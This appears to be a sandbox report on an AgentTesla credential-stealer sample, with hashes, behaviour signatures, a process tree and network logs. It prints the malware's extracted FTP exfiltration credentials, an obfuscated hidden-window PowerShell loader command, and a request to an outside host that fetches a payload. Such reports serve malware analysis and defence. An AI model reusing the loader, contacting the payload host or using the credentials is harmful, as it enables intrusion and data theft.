Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

67e5c1745d...1e.exe

windows7-x64

8

67e5c1745d...1e.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/01/2025, 06:23 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    67e5c1745d2c3382e6f20e2d7cd876acb687f7859aae4cd2b6b9fae6ca5a441e.exe

  • Size

    1.5MB

  • MD5

    2a3b0c09fb6332a4c35439c0741a3c61

  • SHA1

    1de70829cc27202b8b64235fb19829d32ac72ee1

  • SHA256

    67e5c1745d2c3382e6f20e2d7cd876acb687f7859aae4cd2b6b9fae6ca5a441e

  • SHA512

    901b724023e0ed87ddd483dae7c2c6c2269bb7115f1bfbf87a0b45efd77e20b7bcab183f60b1784ef92d86a6f04e76e719fe2a4d25794304ccc6aebd4bcd7f25

  • SSDEEP

    24576:vmwBXOxw33BYQ+0EnWF9gfJmc6Ns2VDdAVjaP+4a8ztxQX8F9toOSZD98+/1c:DXtY0iJ56nVQjaLa8ztisXuRg

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.carbognin.it
  • Port:
    21
  • Username:
    server@carbognin.it
  • Password:
    59Cif8wZUH#X

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Agenttesla family
    agenttesla
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\67e5c1745d2c3382e6f20e2d7cd876acb687f7859aae4cd2b6b9fae6ca5a441e.exe
    "C:\Users\Admin\AppData\Local\Temp\67e5c1745d2c3382e6f20e2d7cd876acb687f7859aae4cd2b6b9fae6ca5a441e.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Salpiform=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\Liste\Chambrays28\Folkevognsrugbrdene\Basted.Non';$Safianbogbinds=$Salpiform.SubString(36731,3);.$Safianbogbinds($Salpiform)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4832
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:3932
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 1580
          4⤵
          • Program crash
          PID:524
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3932 -ip 3932
    1⤵
      PID:768

    Network

    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      169.133.100.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      169.133.100.95.in-addr.arpa
      IN PTR
      Response
      169.133.100.95.in-addr.arpa
      IN PTR
      a95-100-133-169deploystaticakamaitechnologiescom
    • flag-us
      DNS
      73.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ocsp.digicert.com
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.com
      IN A
      Response
      ocsp.digicert.com
      IN CNAME
      ocsp.edge.digicert.com
      ocsp.edge.digicert.com
      IN CNAME
      cac-ocsp.digicert.com.edgekey.net
      cac-ocsp.digicert.com.edgekey.net
      IN CNAME
      e3913.cd.akamaiedge.net
      e3913.cd.akamaiedge.net
      IN A
      104.78.173.167
    • flag-us
      DNS
      167.173.78.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      167.173.78.104.in-addr.arpa
      IN PTR
      Response
      167.173.78.104.in-addr.arpa
      IN PTR
      a104-78-173-167deploystaticakamaitechnologiescom
    • flag-us
      DNS
      209.205.72.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      209.205.72.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      energigroup.hu
      msiexec.exe
      Remote address:
      8.8.8.8:53
      Request
      energigroup.hu
      IN A
      Response
      energigroup.hu
      IN A
      139.28.140.243
    • flag-hu
      GET
      http://energigroup.hu/nNifdlrg32.bin
      msiexec.exe
      Remote address:
      139.28.140.243:80
      Request
      GET /nNifdlrg32.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
      Host: energigroup.hu
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 28 Jan 2025 06:24:24 GMT
      Server: Apache
      Upgrade: h2,h2c
      Connection: Upgrade
      Last-Modified: Thu, 23 Jan 2025 05:26:06 GMT
      Accept-Ranges: bytes
      Content-Length: 241728
      Content-Type: application/octet-stream
    • flag-us
      DNS
      243.140.28.139.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      243.140.28.139.in-addr.arpa
      IN PTR
      Response
      243.140.28.139.in-addr.arpa
      IN PTR
      cl6mikrovpshu
    • flag-us
      DNS
      53.210.109.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      53.210.109.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      206.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      41.173.79.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      41.173.79.40.in-addr.arpa
      IN PTR
      Response
    • 139.28.140.243:80
      http://energigroup.hu/nNifdlrg32.bin
      http
      msiexec.exe
      8.6kB
       249.2kB
       183
      181

      HTTP Request

      GET http://energigroup.hu/nNifdlrg32.bin

      HTTP Response

      200
    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      169.133.100.95.in-addr.arpa
      dns
      73 B
       139 B
       1
      1

      DNS Request

      169.133.100.95.in-addr.arpa

    • 8.8.8.8:53
      73.159.190.20.in-addr.arpa
      dns
      135 B
       342 B
       2
      2

      DNS Request

      73.159.190.20.in-addr.arpa

      DNS Request

      ocsp.digicert.com

      DNS Response

      104.78.173.167

    • 8.8.8.8:53
      167.173.78.104.in-addr.arpa
      dns
      73 B
       139 B
       1
      1

      DNS Request

      167.173.78.104.in-addr.arpa

    • 8.8.8.8:53
      209.205.72.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      209.205.72.20.in-addr.arpa

    • 8.8.8.8:53
      energigroup.hu
      dns
      msiexec.exe
      60 B
       76 B
       1
      1

      DNS Request

      energigroup.hu

      DNS Response

      139.28.140.243

    • 8.8.8.8:53
      243.140.28.139.in-addr.arpa
      dns
      73 B
       102 B
       1
      1

      DNS Request

      243.140.28.139.in-addr.arpa

    • 8.8.8.8:53
      53.210.109.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      53.210.109.20.in-addr.arpa

    • 8.8.8.8:53
      206.23.85.13.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      206.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      172.214.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.214.232.199.in-addr.arpa

    • 8.8.8.8:53
      41.173.79.40.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      41.173.79.40.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Liste\Chambrays28\Folkevognsrugbrdene\Basted.Non
      Filesize

      72KB

      MD5

      8c216f66e8374e616d44d14c9c875497

      SHA1

      ed495bc4ddbd10ec45e22ba94bdb4b4c82b6acaf

      SHA256

      9ea81c8c46e2a8999e75c17e5e27887915638672b01946e4fb3fb7166934fb97

      SHA512

      5236ad4c43796b5245aad3a475b37d88478b286371e6cea36aec30b0d1d7cf0192716bb545b8721a8984d14db45cd14e769176831ec220207d0b65d9c78e542d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Liste\Chambrays28\Folkevognsrugbrdene\Chelicerate.Tur
      Filesize

      343KB

      MD5

      de7d9362c8b4bb9162093ac7d0a432dc

      SHA1

      719babc0986b013d8b1349bd56c9ad697fcec16b

      SHA256

      389095f9cf77f78a7831021b84a312ce2b85637a9ac2ad8b922d11cee7e98fb6

      SHA512

      bc26b14092327391e43126d714bca50984a0387ca5f6f2b20c97f25d0e925d4d3bc0d0bb014dc0fd7fa14c3c92568a670c89c87d878da0e3d5d6abc2873eac51

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lq1i3ltn.t5m.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/3932-69-0x0000000001000000-0x0000000002254000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4832-48-0x0000000007DB0000-0x0000000007DBA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4832-49-0x0000000007F10000-0x0000000007F21000-memory.dmp

      Filesize

      68KB

      Download

    • memory/4832-50-0x0000000008510000-0x000000000851E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4832-13-0x00000000061F0000-0x0000000006256000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4832-23-0x0000000006260000-0x00000000065B4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4832-24-0x0000000006830000-0x000000000684E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4832-25-0x0000000006DD0000-0x0000000006E1C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4832-26-0x00000000078E0000-0x0000000007976000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4832-27-0x0000000006CF0000-0x0000000006D0A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4832-28-0x0000000006D40000-0x0000000006D62000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4832-29-0x0000000007F30000-0x00000000084D4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4832-10-0x0000000005AE0000-0x0000000006108000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4832-31-0x0000000008B60000-0x00000000091DA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4832-32-0x0000000007C40000-0x0000000007C72000-memory.dmp

      Filesize

      200KB

      Download

    • memory/4832-43-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-45-0x0000000007CB0000-0x0000000007D53000-memory.dmp

      Filesize

      652KB

      Download

    • memory/4832-33-0x00000000709A0000-0x00000000709EC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4832-44-0x0000000007C80000-0x0000000007C9E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4832-7-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4832-47-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-12-0x0000000006180000-0x00000000061E6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4832-46-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-11-0x0000000005990000-0x00000000059B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4832-51-0x0000000008520000-0x0000000008534000-memory.dmp

      Filesize

      80KB

      Download

    • memory/4832-52-0x0000000008560000-0x000000000857A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4832-53-0x0000000008550000-0x0000000008558000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4832-54-0x00000000085B0000-0x00000000085DA000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4832-55-0x00000000085E0000-0x0000000008604000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4832-56-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-57-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4832-58-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-59-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-9-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-61-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-62-0x00000000091E0000-0x000000000AC07000-memory.dmp

      Filesize

      26.2MB

      Download

    • memory/4832-63-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-64-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-65-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-66-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-67-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-68-0x0000000074B80000-0x0000000075330000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4832-8-0x0000000002F20000-0x0000000002F56000-memory.dmp

      Filesize

      216KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.